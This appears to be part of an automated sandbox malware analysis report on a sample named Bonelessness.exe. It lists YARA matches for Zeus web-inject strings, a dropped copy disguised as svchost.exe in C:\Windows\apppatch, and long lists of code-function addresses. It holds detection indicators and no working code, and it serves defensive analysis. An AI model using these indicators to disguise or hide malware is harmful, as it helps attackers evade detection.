      Source: 00000001.00000003.2079645449.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2088591684.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2085749007.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2107473137.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2107627120.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2107190009.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.1664876030.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2100321942.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2064074801.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2106495197.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2046920489.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2082103389.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2103873411.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2060038870.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2086084822.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2033279627.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2090984983.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: 00000001.00000003.2099961240.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: Bonelessness.exe PID: 6696, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: svchost.exe PID: 6720, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6260, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6216, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 3496, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7140, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7124, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7088, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7064, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7040, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7024, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7008, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6988, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6968, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6944, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6920, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6896, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6876, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
      Source: Yara matchFile source: 0.2.Bonelessness.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.3.svchost.exe.2601000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.3.Bonelessness.exe.868460.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Bonelessness.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Bonelessness.exe PID: 6696, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6720, type: MEMORYSTR
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004021B0: CreateFileA,DeviceIoControl,CloseHandle,0_2_004021B0
      Source: C:\Users\user\Desktop\Bonelessness.exeFile created: C:\Windows\apppatch\svchost.exeJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeFile created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004090E00_2_004090E0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0043A1C00_2_0043A1C0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0040EA400_2_0040EA40
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004412400_2_00441240
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004352300_2_00435230
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004443000_2_00444300
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00442B100_2_00442B10
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004463300_2_00446330
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004403F00_2_004403F0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0043BC400_2_0043BC40
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0040EC600_2_0040EC60
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004234600_2_00423460
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00445C600_2_00445C60
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0044A4100_2_0044A410
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004145400_2_00414540
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004455900_2_00445590
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0043C5A00_2_0043C5A0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0042E6E00_2_0042E6E0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00441EB00_2_00441EB0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004437700_2_00443770
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0043C7800_2_0043C780
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0043A7A00_2_0043A7A0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004090E01_2_004090E0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043A1C01_2_0043A1C0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0040EA401_2_0040EA40
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004412401_2_00441240
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004352301_2_00435230
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004443001_2_00444300
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00442B101_2_00442B10
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004463301_2_00446330
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004403F01_2_004403F0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043BC401_2_0043BC40
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0040EC601_2_0040EC60
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004234601_2_00423460
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00445C601_2_00445C60
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0044A4101_2_0044A410
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004145401_2_00414540
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004455901_2_00445590
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043C5A01_2_0043C5A0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0042E6E01_2_0042E6E0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00441EB01_2_00441EB0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_004437701_2_00443770
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043C7801_2_0043C780
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0043A7A01_2_0043A7A0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D22CE01_2_02D22CE0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D612F01_2_02D612F0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D482E01_2_02D482E0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5BAB01_2_02D5BAB0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D563801_2_02D56380
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D543A01_2_02D543A0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5D3701_2_02D5D370
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D558401_2_02D55840
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D288601_2_02D28860
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D3D0601_2_02D3D060
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5F8601_2_02D5F860
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D640101_2_02D64010
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D681C31_2_02D681C3
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5F1901_2_02D5F190
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D561A01_2_02D561A0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2E1401_2_02D2E140
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D286401_2_02D28640
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5AE401_2_02D5AE40
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D4EE301_2_02D4EE30
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D59FF01_2_02D59FF0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5C7101_2_02D5C710
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5DF001_2_02D5DF00
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D5FF301_2_02D5FF30
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D53DC01_2_02D53DC0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024C9A401_2_024C9A40
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024FC2401_2_024FC240
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024F02301_2_024F0230
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024FF3001_2_024FF300
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024FDB101_2_024FDB10
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_025013301_2_02501330
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024FB3F01_2_024FB3F0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024C40E01_2_024C40E0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024F51C01_2_024F51C0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024E96E01_2_024E96E0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024FCEB01_2_024FCEB0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024FE7701_2_024FE770
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024F77801_2_024F7780
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024F57A01_2_024F57A0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024F6C401_2_024F6C40
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024C9C601_2_024C9C60
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024DE4601_2_024DE460
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02500C601_2_02500C60
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_025054101_2_02505410
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024CF5401_2_024CF540
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_025005901_2_02500590
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024F75A01_2_024F75A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CBAB05_2_028CBAB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028B82E05_2_028B82E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028D12F05_2_028D12F0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028C63805_2_028C6380
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028C43A05_2_028C43A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CD3705_2_028CD370
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028D40105_2_028D4010
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028C58405_2_028C5840
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028988605_2_02898860
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028AD0605_2_028AD060
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CF8605_2_028CF860
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CF1905_2_028CF190
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028C61A05_2_028C61A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028D81C35_2_028D81C3
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289E1405_2_0289E140
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028BEE305_2_028BEE30
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028986405_2_02898640
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CAE405_2_028CAE40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028C9FF05_2_028C9FF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CDF005_2_028CDF00
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CC7105_2_028CC710
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028CFF305_2_028CFF30
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_02892CE05_2_02892CE0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028C3DC05_2_028C3DC0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E440E05_2_00E440E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E751C05_2_00E751C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E49A405_2_00E49A40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E82A4D5_2_00E82A4D
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E7C2405_2_00E7C240
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E702305_2_00E70230
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E7B3F05_2_00E7B3F0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E813305_2_00E81330
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E7F3005_2_00E7F300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E7DB105_2_00E7DB10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E49C605_2_00E49C60
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E5E4605_2_00E5E460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E80C605_2_00E80C60
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E76C405_2_00E76C40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E854105_2_00E85410
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E775A05_2_00E775A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E805905_2_00E80590
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E4F5405_2_00E4F540
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E696E05_2_00E696E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E7CEB05_2_00E7CEB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E88FC35_2_00E88FC3
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E757A05_2_00E757A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E777805_2_00E77780
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E7E7705_2_00E7E770
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024682E06_2_024682E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024812F06_2_024812F0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247BAB06_2_0247BAB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0247D3706_2_0247D370
